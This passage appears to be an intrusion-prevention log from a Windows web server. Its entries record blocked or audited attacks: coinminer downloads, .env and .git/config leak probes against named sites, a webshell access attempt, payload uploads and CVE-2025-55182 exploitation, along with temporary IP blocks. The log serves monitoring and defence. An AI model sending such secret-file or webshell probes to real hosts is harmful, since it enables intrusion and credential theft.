zd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjo0MDYyNCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAyNzYyNjQxMCwidWlkIjoiN0UzNjI1MUEtMDAyMC1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000d316	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770030556.8641819953918457031250			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
000003be	01dc9434d8e3c51c	000000ce	0000000f	164a8367	ab0b628d	00000002	00000002	00000001	01dc9434b38334fe	01dc9434b38334fe	00000001	00000128	[SID: 32066] Audit: Environment Config File Download Attempt attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkIzN0ZGRTJFLTk0MzQtMTFGMS04ODcyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzIwNjYsIm5hbWUiOiJBdWRpdDogRW52aXJvbm1lbnQgQ29uZmlnIEZpbGUgRG93bmxvYWQgQXR0ZW1wdCIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		00007d42	00010000	00000002	00000002	0000fae5	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: Environment Config File Download Attempt	http://phucca.internship.io.vn/.env			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc9435785735bc	000000cf	00000007	164a8367	00a3c786	00000001	00000000	00000001	01dc9435774506a7	01dc9436dce5c2a7	00000001	00000000	The client will block traffic from IP address 134.199.163.0 for the next 600 seconds (from 2/2/2026 6:17:06 PM to 2/2/2026 6:27:06 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003a1	01dc9435999edb14	000000ce	0000000f	164a8367	6d6eb2c3	00000002	00000002	00000001	01dc943575230617	01dc943575230617	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc1MjJFMUQwLTk0MzUtMTFGMS1CQkE5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000cb62	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://xaylapangiang.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000403	01dc94359cf46844	000000ce	00000003	164a8367	00a3c786	00000002	00000001	00000001	01dc9435770244c0	01dc9435770244c0	00000001	00000158	[SID: 35300] Web Attack: Meta React Server Components CVE-2025-55182 2 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc3MDIzMDc4LTk0MzUtMTFGMS1CQTcyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUzMDAsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIDIiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089e4	00010000	00000002	00000002	0000e3a8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182 2	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003fb	01dc94359cf46844	000000ce	00000003	164a8367	00a3c786	00000002	00000001	00000001	01dc94357704a69b	01dc94357704a69b	00000001	00000154	[SID: 35256] Web Attack: Meta React Server Components CVE-2025-55182 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc3MDIzMDc3LTk0MzUtMTFGMS1CQTcyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJjdmVfdWlkIjoiQ1ZFLTIwMjUtNTUxODIiLCJpZCI6MzUyNTYsIm5hbWUiOiJXZWIgQXR0YWNrOiBNZXRhIFJlYWN0IFNlcnZlciBDb21wb25lbnRzIENWRS0yMDI1LTU1MTgyIiwicmlza19pZCI6MCwidHlwZV9pZCI6Nn19			Default	none		000089b8	00010001	00000002	00000002	0000e3a8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Meta React Server Components CVE-2025-55182	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a3	01dc94359cf46844	000000ce	00000003	164a8367	00a3c786	00000002	00000001	00000001	01dc943577070950	01dc943577070950	00000001	0000011c	[SID: 35273] Web Attack: Malicious Payload Upload 40 attack blocked. Traffic has been blocked for this application: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc3MDIzMDc2LTk0MzUtMTFGMS1CQTcyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzUyNzMsIm5hbWUiOiJXZWIgQXR0YWNrOiBNYWxpY2lvdXMgUGF5bG9hZCBVcGxvYWQgNDAiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		000089c9	00010001	00000002	00000002	0000e3a8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: Malicious Payload Upload 40	http://103.131.74.22:80/			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc9435ecca02f8	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc9435c7ab950c	01dc9435c7ab950c	00000001	00000000	Active Response that started at 2/2/2026 6:09:21 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000215	01dc943703fc11c0	000000d3	0000000f	164a8367	00a3c786	00000001	00000000	00000000	01dc9436dd20b8eb	01dc9436dd20b8eb	00000001	00000000	Active Response that started at 2/2/2026 6:17:06 PM is disengaged. The traffic from IP address 134.199.163.0 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
000003b4	01dc94374d1f6a80	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc943726526916	01dc943726526916	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjI2NTIxODA3LTk0MzctMTFGMS04MTU5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000c352	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://class.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003a6	01dc9437ecc2c3f4	000000ce	0000000f	164a8367	6d6eb2c3	00000002	00000002	00000001	01dc9437c62180b8	01dc9437c62180b8	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkM2MUU0OUVGLTk0MzctMTFGMS04MjVGLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000e59c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://moitruongquangminh.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b2	01dc9438cee216ae	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc9438aa4c53c1	01dc9438aa4c53c1	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkFBNDlEQUQ0LTk0MzgtMTFGMS1BMjExLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000e6f6	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://com.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b5	01dc9438f0208414	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc9438ca58f908	01dc9438ca58f908	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkNBNThFNEIyLTk0MzgtMTFGMS05MTg0LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000cde0	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://comune.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003b3	01dc9439434b507a	000000ce	0000000f	164a8367	400a942d	00000002	00000002	00000001	01dc94391e0701b2	01dc94391e0701b2	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IjFFMDZFRDVCLTk0MzktMTFGMS1CMjlELTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000d8b8	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://corp.toantrituesmartbrain.com/admin/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
0000039e	01dc9439e2c447c2	000000ce	0000000f	164a8367	f40a942d	00000002	00000002	00000001	01dc9439bc654fe3	01dc9439bc654fe3	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkJDNjQ3QjhBLTk0MzktMTFGMS1CNzA5LTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000c952	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://umbalagift.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000211	01dc943a78489607	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc943a760c5fe2	01dc943bdbad1be2	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 6:52:52 PM to 2/2/2026 7:02:52 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc943a998228d9	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc943a759eb317	01dc943a759eb317	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjQ4ODEyLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDMwOTM5OTc2LCJ1aWQiOiIwNDY4MEUyMy0wMDI3LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiI3NTlFMDFGQi05NDNBLTExRjEtQTJCOS04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG03OTNlM2JlNS1hY2EyLTRmOTEtOWE1MS01MTYzYjg1ZjI0NGIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQSIsIm5hbWUiOiJ3M3dwLmV4ZSIsInBhdGgiOiJjOlxcd2luZG93c1xcc3lzd293NjRcXGluZXRzcnZcXHczd3AuZXhlIiwicHJvZHVjdF9uYW1lIjoiSW50ZXJuZXQgSW5mb3JtYXRpb24gU2VydmljZXMiLCJzaGExIjoiMTkxN0Y2OUVEMjYwRTUxMzEwMTVGOUE1RDcyMTFBRjcwRjBFQTUzQiIsInNoYTIiOiJBNEUxQTVCMTQ4OUIzMTYwNjRGMDgzQzRDRDdCRkM4M0I3MEVFNDY4NEE0RDk3RDFBRDFDNEU2RDY0ODE2MUEzIiwic2lnbmF0dXJlX2NvbXBhbnlfbmFtZSI6Ik1pY3Jvc29mdCBDb3Jwb3JhdGlvbiIsInNpZ25hdHVyZV9jcmVhdGVkX2RhdGUiOjE3NDgzNTg1NDAwMDAsInNpZ25hdHVyZV9pc3N1ZXIiOiJNaWNyb3NvZnQgV2luZG93cyBQcm9kdWN0aW9uIFBDQSAyMDExIiwic2lnbmF0dXJlX3ZhbHVlIjoxMDk5NTIwNzc0MTk5LCJzaWduYXR1cmVfdmFsdWVfaWRzIjpbMSwyLDMsNSw2LDEzLDE2LDE3LDE4LDIwXSwidmVyc2lvbiI6IjEwLjAuMjAzNDguMSIsInhhdHRyaWJ1dGVzIjp7InBvcnRhbCI6ZmFsc2V9fSwicGlkIjo0MDYyNCwic2Vzc2lvbl9pZCI6MCwic3RhcnRfdGltZSI6MTc3MDAyNzYyNjQxMCwidWlkIjoiN0UzNjI1MUEtMDAyMC1GMUYxLUI5RUMtRTBEMEY3ODQwQ0JCIn0sInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzE5MDgsIm5hbWUiOiJXZWIgQXR0YWNrOiBKU0NvaW5taW5lciBEb3dubG9hZCAxMDgiLCJyaXNrX2lkIjowLCJ0eXBlX2lkIjo2fX0=			Default	none		00007ca4	00010001	00000002	00000002	00000050	0000e408	00000000000000000000000000000000	00000000000000000000000000000000	Web Attack: JSCoinminer Download 108	http://geomax.vn/wp-cron.php?doing_wp_cron=1770033167.5928790569305419921875			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		83D24C9DB47A953652AB2C84688CC857A03BF0A3D52587750BE52C36CECD7779	00000000	00000000	
0000038e	01dc943aa0288766	000000ce	0000000f	164a8367	82c9be04	00000002	00000002	00000001	01dc943a7947b2bc	01dc943a7947b2bc	00000001	00000114	[SID: 33355] Audit: WebShell Access Attempt 2 attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6Ijc5NDZFRTVGLTk0M0EtMTFGMS1BNDQyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzMzNTUsIm5hbWUiOiJBdWRpdDogV2ViU2hlbGwgQWNjZXNzIEF0dGVtcHQgMiIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		0000824b	00010000	00000002	00000002	00001e70	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: WebShell Access Attempt 2	http://phanbonquocte.com.vn/shell.php			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
000003aa	01dc943acb5e1d50	000000ce	0000000f	164a8367	8f0a942d	00000002	00000002	00000001	01dc943aa4c98cd9	01dc943aa4c98cd9	00000001	0000011c	[SID: 30711] Audit: .git Directory Information Leak attack detected but not blocked. Application path: SYSTEM		SYSTEM	eyJjb25uZWN0aW9uIjp7ImNvbm5lY3Rpb25fZGlyZWN0aW9uX2lkIjoxfSwiZGV0ZWN0aW9uX3VpZCI6IkE0QzhCODdBLTk0M0EtMTFGMS05NjgyLTgwNkU2RjZFNjk2MyIsInJlbWVkaWF0ZWQiOnRydWUsInRocmVhdCI6eyJpZCI6MzA3MTEsIm5hbWUiOiJBdWRpdDogLmdpdCBEaXJlY3RvcnkgSW5mb3JtYXRpb24gTGVhayIsInJpc2tfaWQiOjAsInR5cGVfaWQiOjZ9fQ==			Default	none		000077f7	00010000	00000002	00000002	0000e70c	00000050	00000000000000000000000000000000	00000000000000000000000000000000	Audit: .git Directory Information Leak	http://www.sieuthighevanphong.com/.git/config			14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000001		0000000000000000000000000000000000000000000000000000000000000000	00000000	00000000	
00000215	01dc943c0074afc5	000000d3	0000000f	164a8367	164a8367	00000001	00000000	00000000	01dc943bdbc716b4	01dc943bdbc716b4	00000001	00000000	Active Response that started at 2/2/2026 6:52:52 PM is disengaged. The traffic from IP address 103.131.74.22 was blocked for 600 second(s).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000211	01dc943d38e90581	000000cf	00000007	164a8367	164a8367	00000001	00000000	00000001	01dc943d38dd193d	01dc943e9e7dd53d	00000001	00000000	The client will block traffic from IP address 103.131.74.22 for the next 600 seconds (from 2/2/2026 7:12:38 PM to 2/2/2026 7:22:38 PM).
						Default	none		00000000	00000000	00000002	00000002	00000000	00000000	00000000000000000000000000000000	00000000000000000000000000000000					14.3.11216.9000	3F12-01/22/2026 00:19:38 127	00000000			00000000	00000000	
00000db9	01dc943d5d75097e	000000ce	00000007	164a8367	164a8367	00000002	00000001	00000001	01dc943d38a8a560	01dc943d38a8a560	00000001	00000a94	[SID: 31908] Web Attack: JSCoinminer Download 108 attack blocked. Traffic has been blocked for this application: C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE		C:\PROGRAM FILES (X86)\PLESK\ADDITIONAL\PLESKPHP56\PHP-CGI.EXE	eyJhY3RvciI6eyJjbWRfbGluZSI6IlwiQzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXFBsZXNrXFxBZGRpdGlvbmFsXFxQbGVza1BIUDU2XFxwaHAtY2dpLmV4ZVwiIiwiZmlsZSI6eyJjb21wYW55X25hbWUiOiJUaGUgUEhQIEdyb3VwIiwiY3JlYXRlZCI6MTU0NzA1MTY3MjAwMCwiZm9sZGVyIjoiYzpcXHByb2dyYW0gZmlsZXMgKHg4NilcXHBsZXNrXFxhZGRpdGlvbmFsXFxwbGVza3BocDU2XFwiLCJtZDUiOiI4MkM1NjQ1NjdDNkI5MTUxNTE0ODBFQjUxMTU4MDhCRSIsIm5hbWUiOiJwaHAtY2dpLmV4ZSIsInBhdGgiOiJjOlxccHJvZ3JhbSBmaWxlcyAoeDg2KVxccGxlc2tcXGFkZGl0aW9uYWxcXHBsZXNrcGhwNTZcXHBocC1jZ2kuZXhlIiwicHJvZHVjdF9uYW1lIjoiUEhQIiwic2hhMSI6IjVBNzg1MkQyMjk0OTMyMDMzRTc2Q0Q2MDY1M0YyQTM1MkMwNjFGRkMiLCJzaGEyIjoiODNEMjRDOURCNDdBOTUzNjUyQUIyQzg0Njg4Q0M4NTdBMDNCRjBBM0Q1MjU4Nzc1MEJFNTJDMzZDRUNENzc3OSIsInNpZ25hdHVyZV92YWx1ZSI6MTA5OTUxMTYyNzc3Niwic2lnbmF0dXJlX3ZhbHVlX2lkcyI6WzBdLCJ2ZXJzaW9uIjoiNS42LjQwIiwieGF0dHJpYnV0ZXMiOnsicG9ydGFsIjpmYWxzZX19LCJwaWQiOjM1NTQwLCJzZXNzaW9uX2lkIjowLCJzdGFydF90aW1lIjoxNzcwMDMzOTQ1Njc3LCJ1aWQiOiIwNDY4MTQyRC0wMDI3LUYxRjEtQjlFQy1FMEQwRjc4NDBDQkIifSwiY29ubmVjdGlvbiI6eyJjb25uZWN0aW9uX2RpcmVjdGlvbl9pZCI6Mn0sImRldGVjdGlvbl91aWQiOiIzOEE1NTFCMC05NDNELTExRjEtQkQ0NC04MDZFNkY2RTY5NjMiLCJwYXJlbnQiOnsiY21kX2xpbmUiOiJDOlxcV0lORE9XU1xcU3lzV09XNjRcXGluZXRzcnZcXHczd3AuZXhlIC1hcCBcInN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXCIgLXYgXCJ2Mi4wXCIgLWwgXCJ3ZWJlbmdpbmU0LmRsbFwiIC1hIFxcXFwuXFxwaXBlXFxpaXNpcG03OTNlM2JlNS1hY2EyLTRmOTEtOWE1MS01MTYzYjg1ZjI0NGIgLWggXCJDOlxcaW5ldHB1YlxcdGVtcFxcYXBwcG9vbHNcXHN1amNvbS5jb20oZG9tYWluKSgyLjApKHBvb2wpXFxzdWpjb20uY29tKGRvbWFpbikoMi4wKShwb29sKS5jb25maWdcIiAtdyBcIlwiIC1tIDAgLXQgNSAtdGEgMCIsImZpbGUiOnsiY29tcGFueV9uYW1lIjoiTWljcm9zb2Z0IENvcnBvcmF0aW9uIiwiY3JlYXRlZCI6MTYyMDQ2MTc2MjE5MSwiZm9sZGVyIjoiYzpcXHdpbmRvd3NcXHN5c3dvdzY0XFxpbmV0c3J2XFwiLCJtZDUiOiIzRDI3MjU3NEYzNzhCQTA2RkQyQjg1Q0I3NzlDMDNBQ